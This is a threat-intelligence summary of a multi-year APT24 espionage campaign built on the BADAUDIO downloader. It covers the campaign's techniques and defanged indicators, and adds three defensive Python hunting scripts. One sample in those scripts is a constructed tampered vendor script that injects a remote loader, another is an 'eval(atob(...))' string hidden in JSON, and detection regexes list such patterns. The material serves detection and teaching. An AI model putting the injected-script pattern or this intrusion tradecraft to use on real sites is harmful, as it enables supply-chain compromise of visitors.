Google Threat Intelligence Group (GTIG) details a three-year espionage campaign by PRC‑nexus actor APT24 that deploys a highly obfuscated first‑stage downloader called BADAUDIO to establish persistent access via strategic web compromises, supply‑chain abuse of a Taiwanese digital marketing firm, and targeted phishing. The report analyzes BADAUDIO’s control‑flow flattening, DLL sideloading, AES‑encrypted payload delivery (including Cobalt Strike Beacon instances), advanced browser fingerprinting for tailored targeting, and shares IOCs and YARA rules to aid detection and mitigation. #APT24 #BADAUDIO
Keypoints
- GTIG attributes a multi‑year, adaptive espionage campaign to APT24 that centers on the custom first‑stage downloader BADAUDIO to establish persistent network access.
- BADAUDIO is heavily obfuscated using control‑flow flattening, collects basic host info, encrypts it with a hard‑coded AES key, and sends it in a cookie to retrieve and decrypt a staged payload in memory.
- Execution commonly leverages DLL Search Order Hijacking and sideloading via legitimate executables, with delivery as encrypted archives containing DLLs plus VBS, BAT, and LNK files to automate placement and persistence.
- Delivery vectors evolved from opportunistic strategic web compromises (malicious JS with FingerprintJS) to targeted supply‑chain compromises of a regional Taiwanese marketing firm and spear‑phishing using cloud storage links.
- GTIG observed Cobalt Strike Beacon as a decrypted second‑stage payload in at least one instance, including a unique watermark tied to prior APT24 activity, and provided YARA rules to detect BADAUDIO variants.
- GTIG mitigated the campaign by blocklisting identified sites, notifying victims and the compromised vendor, developing detection logic for modified scripts, and publishing technical indicators and rules.
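The sideloading pattern summarized above (a malicious DLL executed by a legitimate application, delivered together with the scripts that place it) is something a defender can hunt for in endpoint telemetry. The following is an added example, not GTIG's code or anything from the report: it applies two simple tests to Sysmon Event ID 7 (ImageLoad) records, namely a DLL carrying a system-library name that is loaded from outside the Windows system directories, and a DLL loaded from the same user-writable directory as its loader. The record layout, the short list of library names and all sample events are constructed assumptions.

```python
"""Hunt for DLL search-order hijacking / sideloading (T1574.001) in Sysmon
Event ID 7 (ImageLoad) records.

Added example, not GTIG's code. The report describes BADAUDIO as a malicious
DLL executed by a legitimate application, so the hunt looks for the classic
pattern: a DLL with the name of a system library loaded from outside the
Windows system directories, or a DLL loaded from the same user-writable
directory as the executable that loaded it. Records and the DLL name list
are constructed sample data; field names follow Sysmon's event schema.
"""
import ntpath
from dataclasses import dataclass

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")
USER_WRITABLE = (r"c:\users", r"c:\programdata", r"c:\windows\temp")
# Constructed short list of library names that normally live in System32.
KNOWN_SYSTEM_DLLS = {"version.dll", "dbghelp.dll", "cryptbase.dll", "wtsapi32.dll"}


@dataclass
class ImageLoad:
    image: str         # Sysmon "Image": the process doing the loading
    image_loaded: str  # Sysmon "ImageLoaded": the module that was loaded
    signed: str        # Sysmon "Signed" for the loaded module ("true"/"false")


def _under(path: str, roots) -> bool:
    """True if the path lies beneath any of the given directory roots."""
    p = path.lower()
    return any(p == r or p.startswith(r + "\\") for r in roots)


def sideload_findings(ev: ImageLoad) -> list:
    """Return the reasons (possibly none) this image load looks like sideloading."""
    dll_dir = ntpath.dirname(ev.image_loaded).lower()
    exe_dir = ntpath.dirname(ev.image).lower()
    dll_name = ntpath.basename(ev.image_loaded).lower()
    findings = []
    if dll_name in KNOWN_SYSTEM_DLLS and not _under(ev.image_loaded, SYSTEM_DIRS):
        findings.append("system DLL name loaded from outside the system directories")
    if dll_dir == exe_dir and _under(ev.image_loaded, USER_WRITABLE):
        findings.append("DLL loaded from the loader's own user-writable directory")
    if findings and ev.signed.lower() != "true":
        findings.append("loaded module is unsigned")
    return findings


def hunt(events) -> list:
    """Return (process, module, findings) for every record with at least one finding."""
    hits = []
    for ev in events:
        findings = sideload_findings(ev)
        if findings:
            hits.append((ev.image, ev.image_loaded, findings))
    return hits


# Constructed sample records: one benign system load, one application load
# from Program Files, and one that matches the sideloading pattern.
SAMPLE_EVENTS = [
    ImageLoad(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\version.dll", "true"),
    ImageLoad(r"C:\Program Files\ExampleApp\app.exe", r"C:\Program Files\ExampleApp\helper.dll", "true"),
    ImageLoad(r"C:\Users\alice\AppData\Local\Temp\setup\viewer.exe",
              r"C:\Users\alice\AppData\Local\Temp\setup\version.dll", "false"),
]

if __name__ == "__main__":
    for image, module, reasons in hunt(SAMPLE_EVENTS):
        print(f"{image} -> {module}: {'; '.join(reasons)}")
```

The signed/unsigned check is deliberately only a tie-breaker: a legitimately signed vendor DLL next to its own executable is normal, so the signature status raises the score of an existing finding rather than producing one on its own.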
MITRE Techniques
- [T1574.001] DLL Search Order Hijacking – BADAUDIO is delivered as a malicious DLL that leverages DLL search order hijacking to execute via legitimate applications (‘BADAUDIO typically manifests as a malicious Dynamic Link Library (DLL) leveraging DLL Search Order Hijacking’).
- [T1195.001] Supply Chain Compromise: Software Component – APT24 injected malicious code into a widely used JavaScript library and used a typosquatted CDN to distribute it (‘injected the malicious script into a widely used JavaScript library (MITRE ATT&CK T1195.001) provided by the firm’).
- [T1059.007] JavaScript – The actor dynamically loads and executes JavaScript libraries (jQuery, FingerprintJS2) to perform reconnaissance and deliver payloads (‘Dynamic Dependency Loading: The script dynamically loads legitimate jQuery and FingerprintJS2 libraries (MITRE ATT&CK T1059.007)’).
- [T1059] Command and Scripting Interpreter – Highly obfuscated JavaScript was hidden in a modified JSON file and executed by a compromised script to conceal the final payload (‘the highly obfuscated script (MITRE ATT&CK T1059) was deliberately placed within a maliciously modified JSON file’).
- [T1082] System Information Discovery – The adversary used FingerprintJS2 to collect browser and environment characteristics and generate an x64hash128 fingerprint for targeting (‘Advanced Fingerprinting: FingerprintJS2 is utilized to generate an x64hash128 browser and environmental fingerprint (MITRE ATT&CK T1082)’).
- [T1041] Exfiltration Over C2 Channel – Reconnaissance data (host, URL, user agent, fingerprint, referrer, time, identifier) was POSTed in Base64 to attacker endpoints to stage and validate targets (‘A POST request, transmitting Base64-encoded reconnaissance data … is sent to an attacker’s endpoint (MITRE ATT&CK T1041)’).
- [T1105] Ingress Tool Transfer – Successful C2 responses provided URLs for dynamically loading subsequent scripts that redirected to BADAUDIO landing pages (‘Successful C2 responses trigger the dynamic loading of a subsequent script from a URL provided in the response’s data field … (MITRE ATT&CK T1105)’).
- [T1189] Drive‑by Compromise (Strategic Web Compromise) – The campaign weaponized legitimate websites with injected JavaScript to selectively serve malicious content to Windows visitors (‘strategic web compromise (MITRE ATT&CK T1189) to a single domain’).
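The supply-chain stage (a vendor-provided JavaScript library modified in place, with the obfuscated script hidden inside a JSON file) is exactly the case that asset integrity pinning is built for. The following is an added example, not GTIG's code and not the marketing firm's: it pins the digest of every vendor-served asset in the same `sha384-<base64>` form browsers accept in a Subresource Integrity `integrity` attribute, reports served copies whose digest has changed, and walks JSON assets looking for string values that contain JavaScript call patterns. The file contents, asset paths and the marker regex are constructed assumptions.

```python
"""Integrity checks for third-party web assets (T1195.001 / T1059.007 / T1059).

Added example, not GTIG's or the vendor's code. Two defender checks that the
supply-chain stage of the campaign would trip:
  1. pin the SHA-384 of every vendor-served script and compare it with the
     copy actually served; the digest uses the same format as a browser SRI
     `integrity` attribute, so the baseline doubles as the value to publish;
  2. scan JSON assets for string values that look like executable JavaScript,
     since the obfuscated stage was hidden inside a modified JSON file.
All file contents below are constructed sample data.
"""
import base64
import hashlib
import json
import re


def sri_digest(content: bytes, algo: str = "sha384") -> str:
    """Return an SRI-style '<algo>-<base64 digest>' string for a served asset."""
    return f"{algo}-{base64.b64encode(hashlib.new(algo, content).digest()).decode()}"


def integrity_attribute(digest: str) -> str:
    """HTML attributes a site adds so the browser refuses a modified copy."""
    return f'integrity="{digest}" crossorigin="anonymous"'


def check_baseline(baseline: dict, served: dict) -> list:
    """Compare served assets with pinned digests; report mismatches, missing and unpinned files."""
    issues = []
    for path, digest in baseline.items():
        if path not in served:
            issues.append((path, "missing"))
        elif sri_digest(served[path]) != digest:
            issues.append((path, "digest mismatch"))
    for path in served:
        if path not in baseline:
            issues.append((path, "unpinned asset"))
    return issues


# Constructed heuristics: call patterns that have no business inside config JSON.
SCRIPT_MARKERS = re.compile(
    r"\b(eval|Function|atob|unescape|setTimeout|document\.write)\s*\(|\bfunction\s*\("
)


def script_like_strings(obj, path: str = "$"):
    """Walk a parsed JSON document and yield (json_path, snippet) for suspicious strings."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from script_like_strings(value, f"{path}.{key}")
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            yield from script_like_strings(value, f"{path}[{i}]")
    elif isinstance(obj, str) and SCRIPT_MARKERS.search(obj):
        yield (path, obj[:60])


def scan_json_assets(served: dict) -> list:
    """Return (asset, json_path, snippet) for every script-like string in a JSON asset."""
    findings = []
    for path, content in served.items():
        if not path.endswith(".json"):
            continue
        try:
            doc = json.loads(content)
        except ValueError:
            findings.append((path, "$", "not valid JSON"))
            continue
        findings.extend((path, p, s) for p, s in script_like_strings(doc))
    return findings


# Constructed sample assets: the pinned clean versions and a tampered set in
# which the library gained a script loader and the config gained an eval() string.
CLEAN_VENDOR_JS = b"!function(e){e.track=function(){return 1}}(window);"
TAMPERED_VENDOR_JS = CLEAN_VENDOR_JS + (
    b"\n(function(){var s=document.createElement('script');"
    b"s.src='//placeholder-cdn.invalid/f.js';document.head.appendChild(s)})();"
)
CLEAN_CONFIG_JSON = json.dumps({"settings": {"theme": "dark", "locale": "zh-TW"}}).encode()
TAMPERED_CONFIG_JSON = json.dumps(
    {"settings": {"theme": "dark", "locale": "zh-TW", "init": "eval(atob('<constructed>'))"}}
).encode()

BASELINE = {"lib/vendor.js": sri_digest(CLEAN_VENDOR_JS), "config.json": sri_digest(CLEAN_CONFIG_JSON)}
SERVED = {"lib/vendor.js": TAMPERED_VENDOR_JS, "config.json": TAMPERED_CONFIG_JSON}

if __name__ == "__main__":
    print(integrity_attribute(BASELINE["lib/vendor.js"]))
    print(check_baseline(BASELINE, SERVED))
    print(scan_json_assets(SERVED))
```

Pinning only helps for assets the site includes itself; a script that the vendor library loads at runtime is fetched without an `integrity` check, which is why the JSON scan is kept as a separate monitor on the vendor's served files.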
Indicators of Compromise
- [File Hashes] Malicious JavaScript and BADAUDIO binaries – 88fa2b5489d178e59d33428ba4088d114025acd1febfa8f7971f29130bda1213, 9ce49c07c6de455d37ac86d0460a8ad2544dc15fb5c2907ed61569b69eefd182, and 16 more hashes
- [Domains] Compromised hosting and C2 infrastructure – www[.]twisinbeth[.]com, wispy[.]geneva[.]workers[.]dev, and 15 more domains used for staging and C2
- [C2 Request Path / URL] Example C2 request and staged payload path – https://wispy[.]geneva[.]workers[.]dev/pub/static/img/merged?version=65feddea0367
- [Cloud Storage Links] Encrypted archive distribution – Google Drive and OneDrive links were abused to host encrypted archives containing BADAUDIO (blocked/diverted by Google protections)
- [Cobalt Strike Watermark] Beacon identifier – Watermark_Hash: BeudtKgqnlm0Ruvf+VYxuw== (unique watermark observed in a Cobalt Strike Beacon tied to APT24 activity)
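The indicators above pair naturally with the behaviour described for BADAUDIO's first stage: AES-encrypted host data carried in a cookie to a staging URL such as the workers.dev path listed. The following is an added example, not GTIG's code: it triages constructed proxy log lines, matching hosts against the two published domains (refanged for matching) and flagging any cookie whose value is a long base64 string that decodes to mostly non-printable bytes, which is what an encrypted blob looks like on the wire while a base64-encoded session token does not. The log format, the thresholds and the sample lines are assumptions.

```python
"""Proxy-log triage for BADAUDIO-style staging requests (T1041 / T1105).

Added example, not GTIG's code. BADAUDIO is described as sending AES-encrypted
host data in a cookie and fetching the staged payload from infrastructure
such as the workers.dev path in the IoC list. This script reads constructed
proxy log lines, matches hosts against the published domains, and flags
cookies carrying a long base64 blob that decodes to mostly non-printable
bytes (an encrypted payload rather than an encoded token). The log format
and the thresholds are assumptions.
"""
import base64
import binascii
import re

# The two domains printed in the report's IoC list, refanged for matching.
IOC_DOMAINS = {"www.twisinbeth.com", "wispy.geneva.workers.dev"}

# Constructed log layout: client method host path cookie=<Cookie header>
LOG_RE = re.compile(
    r"^(?P<client>\S+) (?P<method>\S+) (?P<host>\S+) (?P<path>\S+) cookie=(?P<cookie>.*)$"
)


def nonprintable_fraction(data: bytes) -> float:
    """Share of bytes outside printable ASCII; ciphertext scores high, text scores 0."""
    if not data:
        return 0.0
    return sum(1 for b in data if b < 0x20 or b > 0x7E) / len(data)


def opaque_cookies(cookie: str, min_len: int = 32, min_fraction: float = 0.3) -> list:
    """Names of cookies whose value is long, valid base64 and decodes to binary-looking bytes."""
    names = []
    for part in cookie.split(";"):
        name, _, value = part.strip().partition("=")
        if len(value) < min_len:
            continue
        try:
            raw = base64.b64decode(value, validate=True)
        except (binascii.Error, ValueError):
            continue
        if nonprintable_fraction(raw) >= min_fraction:
            names.append(name)
    return names


def triage(lines) -> list:
    """Return (client, host, path, reasons) for each log line that raises at least one flag."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = []
        if m["host"].lower() in IOC_DOMAINS:
            reasons.append("host in published IoC list")
        for name in opaque_cookies(m["cookie"]):
            reasons.append(f"cookie '{name}' carries an opaque binary blob")
        if reasons:
            hits.append((m["client"], m["host"], m["path"], reasons))
    return hits


# Constructed stand-in for an encrypted cookie value: 64 bytes that are all
# non-printable, base64-encoded. Not real BADAUDIO traffic.
CIPHERTEXT_STANDIN = base64.b64encode(bytes(range(0x80, 0xC0))).decode()
# Constructed benign token: base64 of a JSON document, which decodes to printable text.
TOKEN = base64.b64encode(b'{"user":"alice","role":"viewer","exp":1700000000}').decode()

SAMPLE_LOG = [
    "10.0.0.5 GET intranet.example.test /index.html cookie=session=abc123def456; lang=en",
    "10.0.0.7 GET wispy.geneva.workers.dev /pub/static/img/merged?version=65feddea0367 "
    f"cookie=_ga={CIPHERTEXT_STANDIN}",
    f"10.0.0.9 POST api.example.test /login cookie=token={TOKEN}",
]

if __name__ == "__main__":
    for client, host, path, reasons in triage(SAMPLE_LOG):
        print(f"{client} -> {host}{path}: {'; '.join(reasons)}")
```

The domain match is the high-confidence signal; the opaque-cookie test is a hunting heuristic that will also surface legitimate encrypted cookies, so it is best used to prioritise review of requests to newly seen hosts rather than as a blocking rule.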
Read more: https://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/